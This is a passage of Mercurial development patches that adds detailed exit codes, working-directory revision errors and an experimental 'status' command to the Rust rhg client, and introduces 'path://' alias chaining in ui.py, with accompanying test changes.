NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ unset FAKEPATH diff --git a/tests/test-patchbomb.t b/tests/test-patchbomb.t --- a/tests/test-patchbomb.t +++ b/tests/test-patchbomb.t @@ -2998,7 +2998,7 @@ bad value setting ----------------- - $ echo 'intro=mpmwearaclownnose' >> $HGRCPATH + $ echo 'intro=oliviawearaclownnose' >> $HGRCPATH single rev @@ -3006,7 +3006,7 @@ From [test]: test this patch series consists of 1 patches. 
- warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f test foo MIME-Version: 1.0 @@ -3047,7 +3047,7 @@ $ hg email --date '1980-1-1 0:1' -v -t '~foo/bar@example.com' -f 'me*@example.com' -r '10' this patch series consists of 1 patches. - warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f me*@example.com ~foo/bar@example.com MIME-Version: 1.0 # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1616186037 -19800 # Sat Mar 20 02:03:57 2021 +0530 # Node ID 821929d59e01999b9185aabac71f40d0fabafdb4 # Parent d4ba4d51f85fc65935b79aff03c7f3d1bd14a642 rhg: add support for detailed exit code for ConfigParseError This patch adds basic support for detailed exit code to rhg with support for ConfigParseError. For now, if parsing the config results in error, we silently fallbacks to `false`. The python version in this case emits a traceback. Differential Revision: https://phab.mercurial-scm.org/D10253 diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,3 +1,4 @@ +use crate::exitcode; use crate::ui::utf8_to_local; use crate::ui::UiError; use crate::NoRepoInCwdError; @@ -14,7 +15,10 @@ #[derive(Debug)] pub enum CommandError { /// Exit with an error message and "standard" failure exit code. - Abort { message: Vec<u8> }, + Abort { + message: Vec<u8>, + detailed_exit_code: exitcode::ExitCode, + }, /// Exit with a failure exit code but no message. 
Unsuccessful, @@ -28,11 +32,19 @@ impl CommandError { pub fn abort(message: impl AsRef<str>) -> Self { + CommandError::abort_with_exit_code(message, exitcode::ABORT) + } + + pub fn abort_with_exit_code( + message: impl AsRef<str>, + detailed_exit_code: exitcode::ExitCode, + ) -> Self { CommandError::Abort { // TODO: bytes-based (instead of Unicode-based) formatting // of error messages to handle non-UTF-8 filenames etc: // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output message: utf8_to_local(message.as_ref()).into(), + detailed_exit_code: detailed_exit_code, } } @@ -64,7 +76,10 @@ impl From<ConfigValueParseError> for CommandError { fn from(error: ConfigValueParseError) -> Self { - CommandError::abort(error.to_string()) + CommandError::abort_with_exit_code( + error.to_string(), + exitcode::CONFIG_ERROR_ABORT, + ) } } @@ -85,6 +100,7 @@ b"abort: repository {} not found", get_bytes_from_path(at) ), + detailed_exit_code: exitcode::ABORT, }, RepoError::ConfigParseError(error) => error.into(), RepoError::Other(error) => error.into(), @@ -100,6 +116,7 @@ b"abort: no repository found in '{}' (.hg not found)!", get_bytes_from_path(cwd) ), + detailed_exit_code: exitcode::ABORT, } } } @@ -132,6 +149,7 @@ line_message, message ), + detailed_exit_code: exitcode::CONFIG_ERROR_ABORT, } } } diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,6 +6,9 @@ /// Generic abort pub const ABORT: ExitCode = 255; +// Abort when there is a config related error +pub const CONFIG_ERROR_ABORT: ExitCode = 30; + /// Generic something completed but did not succeed pub const UNSUCCESSFUL: ExitCode = 1; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -82,7 +82,14 @@ let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; blackbox.log_command_start(); let result = run(&invocation); - 
blackbox.log_command_end(exit_code(&result)); + blackbox.log_command_end(exit_code( + &result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + )); result } @@ -114,6 +121,7 @@ error, cwd.display() ))), + false, ) }) }); @@ -125,7 +133,13 @@ // "unsupported" error but that is not enforced by the type system. let on_unsupported = OnUnsupported::Abort; - exit(&initial_current_dir, &ui, on_unsupported, Err(error.into())) + exit( + &initial_current_dir, + &ui, + on_unsupported, + Err(error.into()), + false, + ) }); if let Some(repo_path_bytes) = &early_args.repo { @@ -145,6 +159,11 @@ repo_path_bytes ), }), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), ) } } @@ -160,6 +179,11 @@ &ui, OnUnsupported::from_config(&ui, &non_repo_config), Err(error.into()), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), ), }; @@ -176,13 +200,35 @@ repo_result.as_ref(), config, ); - exit(&initial_current_dir, &ui, on_unsupported, result) + exit( + &initial_current_dir, + &ui, + on_unsupported, + result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ) } -fn exit_code(result: &Result<(), CommandError>) -> i32 { +fn exit_code( + result: &Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> i32 { match result { Ok(()) => exitcode::OK, - Err(CommandError::Abort { .. 
}) => exitcode::ABORT, + Err(CommandError::Abort { + message: _, + detailed_exit_code, + }) => { + if use_detailed_exit_code { + *detailed_exit_code + } else { + exitcode::ABORT + } + } Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL, // Exit with a specific code and no error message to let a potential @@ -198,6 +244,7 @@ ui: &Ui, mut on_unsupported: OnUnsupported, result: Result<(), CommandError>, + use_detailed_exit_code: bool, ) -> ! { if let ( OnUnsupported::Fallback { executable }, @@ -238,18 +285,22 @@ } } } - exit_no_fallback(ui, on_unsupported, result) + exit_no_fallback(ui, on_unsupported, result, use_detailed_exit_code) } fn exit_no_fallback( ui: &Ui, on_unsupported: OnUnsupported, result: Result<(), CommandError>, + use_detailed_exit_code: bool, ) -> ! { match &result { Ok(_) => {} Err(CommandError::Unsuccessful) => {} - Err(CommandError::Abort { message }) => { + Err(CommandError::Abort { + message, + detailed_exit_code: _, + }) => { if !message.is_empty() { // Ignore errors when writing to stderr, we’re already exiting // with failure code so there’s not much more we can do. @@ -269,7 +320,7 @@ } } } - std::process::exit(exit_code(&result)) + std::process::exit(exit_code(&result, use_detailed_exit_code)) } macro_rules! subcommands { @@ -411,6 +462,7 @@ "abort: 'rhg.on-unsupported=fallback' without \ 'rhg.fallback-executable' set." 
)), + false, ) }) .to_owned(), diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -3,8 +3,6 @@ Invalid syntax: no value -TODO: add rhg support for detailed exit codes -#if no-rhg $ cat > .hg/hgrc << EOF > novaluekey > EOF @@ -37,7 +35,6 @@ $ hg showconfig config error at $TESTTMP/.hg/hgrc:1: unexpected leading whitespace: [section] [30] -#endif Reset hgrc diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -90,12 +90,9 @@ $ mkdir -p badrepo/.hg $ echo 'invalid-syntax' > badrepo/.hg/hgrc -TODO: add rhg support for detailed exit codes -#if no-rhg $ hg log -b -Rbadrepo default config error at badrepo/.hg/hgrc:1: invalid-syntax [30] -#endif $ hg log -b --cwd=inexistent default abort: $ENOENT$: 'inexistent' # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1616509729 -19800 # Tue Mar 23 19:58:49 2021 +0530 # Node ID e8ae91b1a63d45ff17739047b2ef5546f52973af # Parent 821929d59e01999b9185aabac71f40d0fabafdb4 rhg: raise wdir specific error for `hg debugdata` Helps remove the conditional in `test-debugcommands.t` for rhg. Differential Revision: https://phab.mercurial-scm.org/D10254 diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -35,6 +35,9 @@ #[allow(clippy::unreadable_literal)] pub const WORKING_DIRECTORY_REVISION: Revision = 0x7fffffff; +pub const WORKING_DIRECTORY_HEX: &str = + "ffffffffffffffffffffffffffffffffffffffff"; + /// The simplest expression of what we need of Mercurial DAGs. pub trait Graph { /// Return the two parents of the given `Revision`. 
diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -23,6 +23,8 @@ #[derive(derive_more::From)] pub enum RevlogError { InvalidRevision, + /// Working directory is not supported + WDirUnsupported, /// Found more than one entry whose ID match the requested prefix AmbiguousPrefix, #[from] diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs --- a/rust/hg-core/src/revset.rs +++ b/rust/hg-core/src/revset.rs @@ -7,7 +7,8 @@ use crate::revlog::changelog::Changelog; use crate::revlog::revlog::{Revlog, RevlogError}; use crate::revlog::NodePrefix; -use crate::revlog::{Revision, NULL_REVISION}; +use crate::revlog::{Revision, NULL_REVISION, WORKING_DIRECTORY_HEX}; +use crate::Node; /// Resolve a query string into a single revision. /// @@ -51,6 +52,10 @@ } } if let Ok(prefix) = NodePrefix::from_hex(input) { + if prefix.is_prefix_of(&Node::from_hex(WORKING_DIRECTORY_HEX).unwrap()) + { + return Err(RevlogError::WDirUnsupported); + } return revlog.get_node_rev(prefix); } Err(RevlogError::InvalidRevision) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -157,6 +157,9 @@ impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { + RevlogError::WDirUnsupported => CommandError::abort( + "abort: working directory revision cannot be specified", + ), RevlogError::InvalidRevision => CommandError::abort(format!( "abort: invalid revision identifier: {}", rev diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -531,17 +531,9 @@ Test WdirUnsupported exception -#if no-rhg $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff abort: working directory revision cannot be specified [255] -#else -TODO: add rhg support for (at least parsing) the working 
directory pseudo-changeset - $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff - abort: working directory revision cannot be specified (missing-correct-output !) - abort: invalid revision identifier: ffffffffffffffffffffffffffffffffffffffff (known-bad-output !) - [255] -#endif Test cache warming command # HG changeset patch # User Georges Racinet <georges.racinet@octobus.net> # Date 1615903923 -3600 # Tue Mar 16 15:12:03 2021 +0100 # Node ID c71e8d9e7f2a35e4c93c07cfa1d3dc7d58b07f9e # Parent e8ae91b1a63d45ff17739047b2ef5546f52973af rhg: Initial support for the 'status' command Only comparing the working directory with its first parent revision is supported. The core logic of dirstate handling and `stat`’ing files was already in `hg-core` supporting Python-based hg with Rust extensions, so this is mostly plumbing to rhg’s CLI. For now the command is experimental and disabled by default, since it has some bugs that causes a number of tests to fail. These failures can be seen with: tests/run-tests.py --rhg --extra-config-opt rhg.status=true Differential Revision: https://phab.mercurial-scm.org/D10239 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -212,10 +212,7 @@ } /// For accessing the working copy - - // The undescore prefix silences the "never used" warning. Remove before - // using. - pub fn _working_directory_vfs(&self) -> Vfs<'_> { + pub fn working_directory_vfs(&self) -> Vfs<'_> { Vfs { base: &self.working_directory, } diff --git a/rust/rhg/src/commands/status.rs b/rust/rhg/src/commands/status.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/commands/status.rs @@ -0,0 +1,315 @@ +// status.rs +// +// Copyright 2020, Georges Racinet <georges.racinets@octobus.net> +// +// This software may be used and distributed according to the terms of the +// GNU General Public License version 2 or any later version. 
+ +use crate::error::CommandError; +use crate::ui::Ui; +use clap::{Arg, SubCommand}; +use hg; +use hg::errors::IoResultExt; +use hg::matchers::AlwaysMatcher; +use hg::operations::cat; +use hg::repo::Repo; +use hg::revlog::node::Node; +use hg::utils::hg_path::{hg_path_to_os_string, HgPath}; +use hg::{DirstateMap, StatusError}; +use hg::{HgPathCow, StatusOptions}; +use log::{info, warn}; +use std::convert::TryInto; +use std::fs; +use std::io::BufReader; +use std::io::Read; + +pub const HELP_TEXT: &str = " +Show changed files in the working directory + +This is a pure Rust version of `hg status`. + +Some options might be missing, check the list below. +"; + +pub fn args() -> clap::App<'static, 'static> { + SubCommand::with_name("status") + .alias("st") + .about(HELP_TEXT) + .arg( + Arg::with_name("all") + .help("show status of all files") + .short("-A") + .long("--all"), + ) + .arg( + Arg::with_name("modified") + .help("show only modified files") + .short("-m") + .long("--modified"), + ) + .arg( + Arg::with_name("added") + .help("show only added files") + .short("-a") + .long("--added"), + ) + .arg( + Arg::with_name("removed") + .help("show only removed files") + .short("-r") + .long("--removed"), + ) + .arg( + Arg::with_name("clean") + .help("show only clean files") + .short("-c") + .long("--clean"), + ) + .arg( + Arg::with_name("deleted") + .help("show only deleted files") + .short("-d") + .long("--deleted"), + ) + .arg( + Arg::with_name("unknown") + .help("show only unknown (not tracked) files") + .short("-u") + .long("--unknown"), + ) + .arg( + Arg::with_name("ignored") + .help("show only ignored files") + .short("-i") + .long("--ignored"), + ) +} + +/// Pure data type allowing the caller to specify file states to display +#[derive(Copy, Clone, Debug)] +pub struct DisplayStates { + pub modified: bool, + pub added: bool, + pub removed: bool, + pub clean: bool, + pub deleted: bool, + pub unknown: bool, + pub ignored: bool, +} + +pub const DEFAULT_DISPLAY_STATES: 
DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: false, + deleted: true, + unknown: true, + ignored: false, +}; + +pub const ALL_DISPLAY_STATES: DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: true, + deleted: true, + unknown: true, + ignored: true, +}; + +impl DisplayStates { + pub fn is_empty(&self) -> bool { + !(self.modified + || self.added + || self.removed + || self.clean + || self.deleted + || self.unknown + || self.ignored) + } +} + +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let status_enabled_default = false; + let status_enabled = invocation.config.get_option(b"rhg", b"status")?; + if !status_enabled.unwrap_or(status_enabled_default) { + return Err(CommandError::unsupported( + "status is experimental in rhg (enable it with 'rhg.status = true' \ + or enable fallback with 'rhg.on-unsupported = fallback')" + )); + } + + let ui = invocation.ui; + let args = invocation.subcommand_args; + let display_states = if args.is_present("all") { + // TODO when implementing `--quiet`: it excludes clean files + // from `--all` + ALL_DISPLAY_STATES + } else { + let requested = DisplayStates { + modified: args.is_present("modified"), + added: args.is_present("added"), + removed: args.is_present("removed"), + clean: args.is_present("clean"), + deleted: args.is_present("deleted"), + unknown: args.is_present("unknown"), + ignored: args.is_present("ignored"), + }; + if requested.is_empty() { + DEFAULT_DISPLAY_STATES + } else { + requested + } + }; + + let repo = invocation.repo?; + let mut dmap = DirstateMap::new(); + let dirstate_data = repo.hg_vfs().mmap_open("dirstate")?; + let parents = dmap.read(&dirstate_data)?; + let options = StatusOptions { + // TODO should be provided by the dirstate parsing and + // hence be stored on dmap. Using a value that assumes we aren't + // below the time resolution granularity of the FS and the + // dirstate. 
+ last_normal_time: 0, + // we're currently supporting file systems with exec flags only + // anyway + check_exec: true, + list_clean: display_states.clean, + list_unknown: display_states.unknown, + list_ignored: display_states.ignored, + collect_traversed_dirs: false, + }; + let ignore_file = repo.working_directory_vfs().join(".hgignore"); // TODO hardcoded + let ((lookup, ds_status), pattern_warnings) = hg::status( + &dmap, + &AlwaysMatcher, + repo.working_directory_path().to_owned(), + vec![ignore_file], + options, + )?; + if !pattern_warnings.is_empty() { + warn!("Pattern warnings: {:?}", &pattern_warnings); + } + + if !ds_status.bad.is_empty() { + warn!("Bad matches {:?}", &(ds_status.bad)) + } + if !lookup.is_empty() { + info!( + "Files to be rechecked by retrieval from filelog: {:?}", + &lookup + ); + } + // TODO check ordering to match `hg status` output. + // (this is as in `hg help status`) + if display_states.modified { + display_status_paths(ui, &(ds_status.modified), b"M")?; + } + if !lookup.is_empty() { + let p1: Node = parents + .expect( + "Dirstate with no parents should not list any file to + be rechecked for modifications", + ) + .p1 + .into(); + let p1_hex = format!("{:x}", p1); + let mut rechecked_modified: Vec<HgPathCow> = Vec::new(); + let mut rechecked_clean: Vec<HgPathCow> = Vec::new(); + for to_check in lookup { + if cat_file_is_modified(repo, &to_check, &p1_hex)? 
{ + rechecked_modified.push(to_check); + } else { + rechecked_clean.push(to_check); + } + } + if display_states.modified { + display_status_paths(ui, &rechecked_modified, b"M")?; + } + if display_states.clean { + display_status_paths(ui, &rechecked_clean, b"C")?; + } + } + if display_states.added { + display_status_paths(ui, &(ds_status.added), b"A")?; + } + if display_states.clean { + display_status_paths(ui, &(ds_status.clean), b"C")?; + } + if display_states.removed { + display_status_paths(ui, &(ds_status.removed), b"R")?; + } + if display_states.deleted { + display_status_paths(ui, &(ds_status.deleted), b"!")?; + } + if display_states.unknown { + display_status_paths(ui, &(ds_status.unknown), b"?")?; + } + if display_states.ignored { + display_status_paths(ui, &(ds_status.ignored), b"I")?; + } + Ok(()) +} + +// Probably more elegant to use a Deref or Borrow trait rather than +// harcode HgPathBuf, but probably not really useful at this point +fn display_status_paths( + ui: &Ui, + paths: &[HgPathCow], + status_prefix: &[u8], +) -> Result<(), CommandError> { + for path in paths { + // Same TODO as in commands::root + let bytes: &[u8] = path.as_bytes(); + // TODO optim, probably lots of unneeded copies here, especially + // if out stream is buffered + ui.write_stdout(&[status_prefix, b" ", bytes, b"\n"].concat())?; + } + Ok(()) +} + +/// Check if a file is modified by comparing actual repo store and file system. +/// +/// This meant to be used for those that the dirstate cannot resolve, due +/// to time resolution limits. 
+/// +/// TODO: detect permission bits and similar metadata modifications +fn cat_file_is_modified( + repo: &Repo, + hg_path: &HgPath, + rev: &str, +) -> Result<bool, CommandError> { + // TODO CatRev expects &[HgPathBuf], something like + // &[impl Deref<HgPath>] would be nicer and should avoid the copy + let path_bufs = [hg_path.into()]; + // TODO IIUC CatRev returns a simple Vec<u8> for all files + // being able to tell them apart as (path, bytes) would be nicer + // and OPTIM would allow manifest resolution just once. + let output = cat(repo, rev, &path_bufs).map_err(|e| (e, rev))?; + + let fs_path = repo + .working_directory_vfs() + .join(hg_path_to_os_string(hg_path).expect("HgPath conversion")); + let hg_data_len: u64 = match output.concatenated.len().try_into() { + Ok(v) => v, + Err(_) => { + // conversion of data length to u64 failed, + // good luck for any file to have this content + return Ok(true); + } + }; + let fobj = fs::File::open(&fs_path).when_reading_file(&fs_path)?; + if fobj.metadata().map_err(|e| StatusError::from(e))?.len() != hg_data_len + { + return Ok(true); + } + for (fs_byte, hg_byte) in + BufReader::new(fobj).bytes().zip(output.concatenated) + { + if fs_byte.map_err(|e| StatusError::from(e))? != hg_byte { + return Ok(true); + } + } + Ok(false) +} diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -358,7 +358,9 @@ files root config + status } + pub struct CliInvocation<'a> { ui: &'a Ui, subcommand_args: &'a ArgMatches<'a>, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616058775 -3600 # Thu Mar 18 10:12:55 2021 +0100 # Node ID f1f2961d2816840262131fc6c95c68280a80629a # Parent c71e8d9e7f2a35e4c93c07cfa1d3dc7d58b07f9e path: move handling of "default" (*) suboptions value inside __init__ With the introduction of `path://` scheme the handling of default value will need to be subtler. 
We do simple code movement first to clarify the future changes. Differential Revision: https://phab.mercurial-scm.org/D10260 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2190,16 +2190,12 @@ def __init__(self, ui): dict.__init__(self) - _path, base_sub_options = ui.configsuboptions(b'paths', b'*') for name, loc in ui.configitems(b'paths', ignoresub=True): # No location is the same as not existing. if not loc: continue - loc, sub = ui.configsuboptions(b'paths', name) - sub_opts = base_sub_options.copy() - sub_opts.update(sub) + loc, sub_opts = ui.configsuboptions(b'paths', name) self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) - self._default_sub_opts = base_sub_options def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. @@ -2234,9 +2230,7 @@ # Try to resolve as a local path or URI. try: # we pass the ui instance are warning might need to be issued - return path( - ui, None, rawloc=name, suboptions=self._default_sub_opts - ) + return path(ui, None, rawloc=name) except ValueError: raise error.RepoError(_(b'repository %s does not exist') % name) @@ -2334,17 +2328,19 @@ b'repo: %s' % rawloc ) - suboptions = suboptions or {} + _path, sub_opts = ui.configsuboptions(b'paths', b'*') + if suboptions is not None: + sub_opts.update(suboptions) # Now process the sub-options. If a sub-option is registered, its # attribute will always be present. The value will be None if there # was no valid sub-option. 
for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in suboptions: + if suboption not in sub_opts: setattr(self, attr, None) continue - value = func(ui, self, suboptions[suboption]) + value = func(ui, self, sub_opts[suboption]) setattr(self, attr, value) def _isvalidlocalpath(self, path): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616345535 -3600 # Sun Mar 21 17:52:15 2021 +0100 # Node ID 57218b7ffb2aaeb035e0470537c3377c809903b8 # Parent f1f2961d2816840262131fc6c95c68280a80629a path: extract the path validation logic into its own submethod We will need to re-use this logic for `path://` so we first extract it into its own method. Differential Revision: https://phab.mercurial-scm.org/D10261 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2320,13 +2320,7 @@ self.rawloc = rawloc self.loc = b'%s' % u - # When given a raw location but not a symbolic name, validate the - # location is valid. - if not name and not u.scheme and not self._isvalidlocalpath(self.loc): - raise ValueError( - b'location is not a URL or path to a local ' - b'repo: %s' % rawloc - ) + self._validate_path() _path, sub_opts = ui.configsuboptions(b'paths', b'*') if suboptions is not None: @@ -2343,6 +2337,19 @@ value = func(ui, self, sub_opts[suboption]) setattr(self, attr, value) + def _validate_path(self): + # When given a raw location but not a symbolic name, validate the + # location is valid. + if ( + not self.name + and not self.url.scheme + and not self._isvalidlocalpath(self.loc) + ): + raise ValueError( + b'location is not a URL or path to a local ' + b'repo: %s' % self.rawloc + ) + def _isvalidlocalpath(self, path): """Returns True if the given path is a potentially valid repository. 
This is its own function so that extensions can change the definition of # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616340702 -3600 # Sun Mar 21 16:31:42 2021 +0100 # Node ID 4821cb414a5c982876293cb6f41f98fc9473972a # Parent 57218b7ffb2aaeb035e0470537c3377c809903b8 path: extract sub-option logic into its own method We will need to re-use this logic for `path://` so we first extract it into its own method. Differential Revision: https://phab.mercurial-scm.org/D10262 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2323,19 +2323,13 @@ self._validate_path() _path, sub_opts = ui.configsuboptions(b'paths', b'*') + self._own_sub_opts = {} if suboptions is not None: + self._own_sub_opts = suboptions.copy() sub_opts.update(suboptions) + self._all_sub_opts = sub_opts.copy() - # Now process the sub-options. If a sub-option is registered, its - # attribute will always be present. The value will be None if there - # was no valid sub-option. - for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in sub_opts: - setattr(self, attr, None) - continue - - value = func(ui, self, sub_opts[suboption]) - setattr(self, attr, value) + self._apply_suboptions(ui, sub_opts) def _validate_path(self): # When given a raw location but not a symbolic name, validate the @@ -2350,6 +2344,18 @@ b'repo: %s' % self.rawloc ) + def _apply_suboptions(self, ui, sub_options): + # Now process the sub-options. If a sub-option is registered, its + # attribute will always be present. The value will be None if there + # was no valid sub-option. + for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): + if suboption not in sub_options: + setattr(self, attr, None) + continue + + value = func(ui, self, sub_options[suboption]) + setattr(self, attr, value) + def _isvalidlocalpath(self, path): """Returns True if the given path is a potentially valid repository. 
This is its own function so that extensions can change the definition of # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616065321 -3600 # Thu Mar 18 12:02:01 2021 +0100 # Node ID 83b0a5c0dfec1509edf6b450a1c8c03bbe057f14 # Parent 4821cb414a5c982876293cb6f41f98fc9473972a path: introduce a `path://` syntax to reference other path name This make it easier for a path to reuse the same location of another path with different parameter. This is useful to create path "alias" with common config option. This will become very useful to create path that reference a list of other path. This changeset focus on implemented the basic feature, future changesets will deal with various error management (and associated testing). Differential Revision: https://phab.mercurial-scm.org/D10263 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2197,6 +2197,9 @@ loc, sub_opts = ui.configsuboptions(b'paths', name) self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + for name, p in sorted(self.items()): + p.chain_path(ui, self) + def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. @@ -2331,6 +2334,22 @@ self._apply_suboptions(ui, sub_opts) + def chain_path(self, ui, paths): + if self.url.scheme == b'path': + assert self.url.path is None + subpath = paths[self.url.host] + self.url = subpath.url + self.rawloc = subpath.rawloc + self.loc = subpath.loc + if self.branch is None: + self.branch = subpath.branch + else: + base = self.rawloc.rsplit(b'#', 1)[0] + self.rawloc = b'%s#%s' % (base, self.branch) + suboptions = subpath._all_sub_opts.copy() + suboptions.update(self._own_sub_opts) + self._apply_suboptions(ui, suboptions) + def _validate_path(self): # When given a raw location but not a symbolic name, validate the # location is valid. 
diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -211,3 +211,126 @@ 000000000000 $ cd .. + +Testing path referencing other paths +==================================== + +basic setup +----------- + + $ ls -1 + a + b + gpath1 + suboptions + $ hg init chained_path + $ cd chained_path + $ cat << EOF > .hg/hgrc + > [paths] + > default=../a + > other_default=path://default + > path_with_branch=../branchy#foo + > other_branch=path://path_with_branch + > other_branched=path://path_with_branch#default + > pushdest=../push-dest + > pushdest:pushrev=default + > pushdest2=path://pushdest + > pushdest-overwrite=path://pushdest + > pushdest-overwrite:pushrev=foo + > EOF + + $ hg init ../branchy + $ hg init ../push-dest + $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5' + $ hg log -G -T '{branch}\n' -R ../branchy + o foo + | + o foo + | + o foo + | + o foo + | + o foo + | + | o default + | | + | o default + | | + | o default + |/ + o default + + + $ hg paths + default = $TESTTMP/a + gpath1 = http://hg.example.com/ + other_branch = $TESTTMP/branchy#foo + other_branched = $TESTTMP/branchy#default + other_default = $TESTTMP/a + path_with_branch = $TESTTMP/branchy#foo + pushdest = $TESTTMP/push-dest + pushdest:pushrev = default + pushdest-overwrite = $TESTTMP/push-dest + pushdest-overwrite:pushrev = foo + pushdest2 = $TESTTMP/push-dest + pushdest2:pushrev = default + +test basic chaining +------------------- + + $ hg path other_default + $TESTTMP/a + $ hg pull default + pulling from $TESTTMP/a + no changes found + $ hg pull other_default + pulling from $TESTTMP/a + no changes found + +test inheritance of the #fragment part +-------------------------------------- + + $ hg pull path_with_branch + pulling from $TESTTMP/branchy + adding changesets + adding manifests + adding file changes + added 6 changesets with 0 changes to 0 files + new changesets 1ea73414a91b:bcebb50b77de + (run 'hg update' to get a working copy) + $ hg 
pull other_branch + pulling from $TESTTMP/branchy + no changes found + $ hg pull other_branched + pulling from $TESTTMP/branchy + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 0 changes to 0 files (+1 heads) + new changesets 66f7d451a68b:2dc09a01254d + (run 'hg heads' to see heads) + +test inheritance of the suboptions +---------------------------------- + + $ hg push pushdest + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 0 changes to 0 files + $ hg push pushdest2 + pushing to $TESTTMP/push-dest + searching for changes + no changes found + [1] + $ hg push pushdest-overwrite --new-branch + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 5 changesets with 0 changes to 0 files (+1 heads) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616540133 -3600 # Tue Mar 23 23:55:33 2021 +0100 # Node ID 1ecf082386b707d80d06caba6a9d3e75bdbe43b5 # Parent 83b0a5c0dfec1509edf6b450a1c8c03bbe057f14 path: forbid chaining `path://` definitions To have `path://xxx` referencing paths that use `path://` too, we need to analyze dependencies to initialize them in the right order (and to detect cycle). I don't want to deal with that right now, so I just disallow it for now. 
